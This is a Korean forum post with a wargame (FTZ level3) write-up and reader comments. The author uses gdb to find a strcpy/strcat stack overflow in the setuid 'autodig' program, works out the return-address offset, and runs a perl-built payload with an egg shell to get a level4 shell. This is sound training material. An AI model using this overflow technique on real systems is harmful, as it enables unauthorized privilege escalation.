1581,

1/80

trynerr

[자작] level3 BOF로 풀어보기!!

http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=1237 [복사]

[level3@ftz level3]$ gdb -q autodig
(gdb) disas main
Dump of assembler code for function main:
0x08048510 <main+0>:    push   %ebp
0x08048511 <main+1>:    mov    %esp,%ebp
0x08048513 <main+3>:    sub    $0x78,%esp
0x08048516 <main+6>:    cmpl   $0x2,0x8(%ebp)
0x0804851a <main+10>:   je     0x804854c <main+60>
0x0804851c <main+12>:   sub    $0xc,%esp
0x0804851f <main+15>:   push   $0x8048628
0x08048524 <main+20>:   call   0x80483cc <printf>
0x08048529 <main+25>:   add    $0x10,%esp
0x0804852c <main+28>:   sub    $0x8,%esp
0x0804852f <main+31>:   mov    0xc(%ebp),%eax
0x08048532 <main+34>:   pushl  (%eax)
0x08048534 <main+36>:   push   $0x8048641
0x08048539 <main+41>:   call   0x80483cc <printf>
0x0804853e <main+46>:   add    $0x10,%esp
0x08048541 <main+49>:   sub    $0xc,%esp
0x08048544 <main+52>:   push   $0x0
0x08048546 <main+54>:   call   0x80483ec <exit>
0x0804854b <main+59>:   nop
0x0804854c <main+60>:   sub    $0x8,%esp
0x0804854f <main+63>:   push   $0x8048652
0x08048554 <main+68>:   lea    0xffffff88(%ebp),%eax
0x08048557 <main+71>:   push   %eax
0x08048558 <main+72>:   call   0x80483fc <strcpy>
0x0804855d <main+77>:   add    $0x10,%esp
0x08048560 <main+80>:   sub    $0x8,%esp
0x08048563 <main+83>:   mov    0xc(%ebp),%eax
0x08048566 <main+86>:   add    $0x4,%eax
0x08048569 <main+89>:   pushl  (%eax)
0x0804856b <main+91>:   lea    0xffffff88(%ebp),%eax
0x0804856e <main+94>:   push   %eax
0x0804856f <main+95>:   call   0x80483bc <strcat>
0x08048574 <main+100>:  add    $0x10,%esp
0x08048577 <main+103>:  sub    $0x8,%esp
0x0804857a <main+106>:  push   $0x8048658
0x0804857f <main+111>:  lea    0xffffff88(%ebp),%eax
0x08048582 <main+114>:  push   %eax
0x08048583 <main+115>:  call   0x80483bc <strcat>
---Type <return> to continue, or q <return> to quit---
0x08048588 <main+120>:  add    $0x10,%esp
0x0804858b <main+123>:  sub    $0x8,%esp
0x0804858e <main+126>:  push   $0xbbc
0x08048593 <main+131>:  push   $0xbbc
0x08048598 <main+136>:  call   0x80483dc <setreuid>
0x0804859d <main+141>:  add    $0x10,%esp
0x080485a0 <main+144>:  sub    $0xc,%esp
0x080485a3 <main+147>:  lea    0xffffff88(%ebp),%eax
0x080485a6 <main+150>:  push   %eax
0x080485a7 <main+151>:  call   0x804838c <system>
0x080485ac <main+156>:  add    $0x10,%esp
0x080485af <main+159>:  leave
0x080485b0 <main+160>:  ret
0x080485b1 <main+161>:  lea    0x0(%esi),%esi
0x080485b4 <main+164>:  nop
0x080485b5 <main+165>:  nop
0x080485b6 <main+166>:  nop
0x080485b7 <main+167>:  nop
0x080485b8 <main+168>:  nop
0x080485b9 <main+169>:  nop
0x080485ba <main+170>:  nop
0x080485bb <main+171>:  nop
0x080485bc <main+172>:  nop
0x080485bd <main+173>:  nop
0x080485be <main+174>:  nop
0x080485bf <main+175>:  nop
End of assembler dump.

보시면 아시겠지만
0x0804856b <main+91>:   lea    0xffffff88(%ebp),%eax
0x0804856e <main+94>:   push   %eax
0x0804856f <main+95>:   call   0x80483bc <strcat>
ebp-78부분에 부터 쓰기 시작하네요...

(gdb) break *main+100
Breakpoint 1 at 0x8048574
(gdb) r `perl -e 'print "A"x1024'`
Starting program: /bin/autodig `perl -e 'print "A"x1024'`

Breakpoint 1, 0x08048574 in main ()
(gdb) x/100wx $esp
0xbffff6d0:     0xbffff6e0      0xbffff899      0x4002bdbd      0x40024a88
0xbffff6e0:     0x20676964      0x41414140      0x41414141      0x41414141
0xbffff6f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff700:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff710:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff720:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff730:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff740:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff750:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff760:     0x41414141      0x41414141      0x41414141      0x41414141
...
(gdb) info regi ebp
ebp            0xbffff758       0xbffff758
(gdb)

return address가 0xbffff75c네요...
값들을 제대로 넣어보죠...

(gdb) r `perl -e 'print "A"x120'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /bin/autodig `perl -e 'print "A"x120'`

Breakpoint 1, 0x08048574 in main ()
(gdb) x/100wx $esp
0xbffffa50:     0xbffffa60      0xbffffc21      0x4002bdbd      0x40024a88
0xbffffa60:     0x20676964      0x41414140      0x41414141      0x41414141
0xbffffa70:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffa80:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffa90:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffaa0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffab0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffac0:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffad0:     0x41414141      0x41414141      0x41414141      0x40030041
0xbffffae0:     0x00000002      0xbffffb24      0xbffffb30      0x4001582c
0xbffffaf0:     0x00000002      0x08048670      0x00000000      0x08048431
0xbffffb00:     0x08048510      0x00000002      0xbffffb24      0x08048354
0xbffffb10:     0x08048600      0x4000c660      0xbffffb1c      0x08048410
0xbffffb20:     0x00000002      0xbffffc14      0xbffffc21      0x00000000
0xbffffb30:     0xbffffc9a      0xbffffcb5      0xbffffcd3      0xbffffcde
0xbffffb40:     0xbffffcee      0xbffffcfc      0xbffffd08      0xbffffecb
0xbffffb50:     0xbfffff0d      0xbfffff29      0xbfffff3a      0xbfffff4f
0xbffffb60:     0xbfffff60      0xbfffff71      0xbfffff83      0xbfffff8b
0xbffffb70:     0xbfffffa9      0xbfffffb8      0xbfffffda      0x00000000
0xbffffb80:     0x00000010      0x0febfbff      0x00000006      0x00001000
0xbffffb90:     0x00000011      0x00000064      0x00000003      0x08048034
0xbffffba0:     0x00000004      0x00000020      0x00000005      0x00000006
0xbffffbb0:     0x00000007      0x40000000      0x00000008      0x00000000
0xbffffbc0:     0x00000009      0x08048670      0x0000000b      0x00000bbb
0xbffffbd0:     0x0000000c      0x00000bbb      0x0000000d      0x00000bbb
(gdb) info regi ebp
ebp            0xbffffad8       0xbffffad8
(gdb) x/s 0xbffffa60
0xbffffa60:      "dig @", 'A' <repeats 120 times>
(gdb)
앞에 dig @ <- 5byte를 사용했으니
정확하게는 A를 120개 넣어두는것이 아니고 119개를 넣어두어야하겠네요.

A를 119개 넣어두고 뒤에 4byte는 원하는 egg shell위치에 넣어두면 정확히 overflow 성공하겠네요...
마지막 strcat되는 부분은 return Address 뒤로 쓰게 되니까 생각할 필요가 없을것 같네요.

자 그럼 해봅시다.

[level3@ftz tmp]$ ls -al
total 12
drwxrwxr-x    2 root     level3       4096 Aug  4 09:23 .
drwxr-xr-x    4 root     level3       4096 May  7  2002 ..
-rw-rw-r--    1 level3   level3       1000 Aug  4 09:23 egg.c
[level3@ftz tmp]$ gcc -o egg egg.c
[level3@ftz tmp]$ ./egg
esp : 0xbffffb18
sh-2.05b$

Egg Shell을 띄어놓고... 공격을 해봅시다.

sh-2.05b$ autodig `perl -e 'print "A"x119,"\x18\xfb\xff\xbf"'`
dig: Couldn't find server 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuy¿': Name or service not known
sh-2.05b$ id
uid=3004(level4) gid=3003(level3) groups=3003(level3)
sh-2.05b$

hint 파일에서 코드를 속인게 있네요...
0x08048598 <main+136>:  call   0x80483dc <setreuid>
문명 이 코드가 autodig 프로그램 속에 들어가있는데.
실제 hint 파일엔 그 함수 선언이 되어있지 않네요...

[level3@ftz level3]$ cat hint

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv){

    char cmd[100];

    if( argc!=2 ){
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }

    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");

    system( cmd );

}

[level3@ftz level3]$

실제로 저 코드로 돌렸을경우엔 level4의 권한을 획득하지 못합니다.
setreuid함수가 실행되어야만 획득할수 있습니다.
그래서 저는 hint파일만 보고 setreuid를 쉘코드에 넣고 돌려도 가능하리라 예상했던것인데..
gdb로 긁어보니 실제로는 setreuid함수가 코드에 포함되어 있었네요.

그럼 수고하세요...

Hit : 8728 Date : 2009/08/04 09:28


CodeAche	개인적으로 gdb로 어떻게 분석해야하는지 몰라서..좀 필요한 능력같아 여러가지 검색도 해보고 어셈공부도 해보고했는데 .. 괜찮은 문서없나요? 리눅스상에서 gdb 사용하는 분석법에 관련된 문서가 잘 안보이네요.	2009/08/04
trynerr	다른문서는 잘모르겠고 와우해커 달고나님께서 쓰신 BOF문서를 추천합니다. 저도 그것가지고 공부했었는데 정말 자세하고 친절하게 설명해주신 문서랍니다. 그 문서에서 gdb 분석하는 부분도 설명해주시는데 그것만 가지고도 충분히 BOF분석이 가능한것 같습니다.	2009/08/04
CodeAche	감사합니다 달고나님이 쓰신BOF문서 참 좋군요.. 예전부터 이런걸 찾았는데..왜 내 눈엔 안띄었지 05년도에 만든문선데;; 큰 도움됐습니다~	2009/08/05
dkdkfjgh	레벨3부터 bof로 풀면 ㅋㅋㅋ 미치겠다,	2009/08/18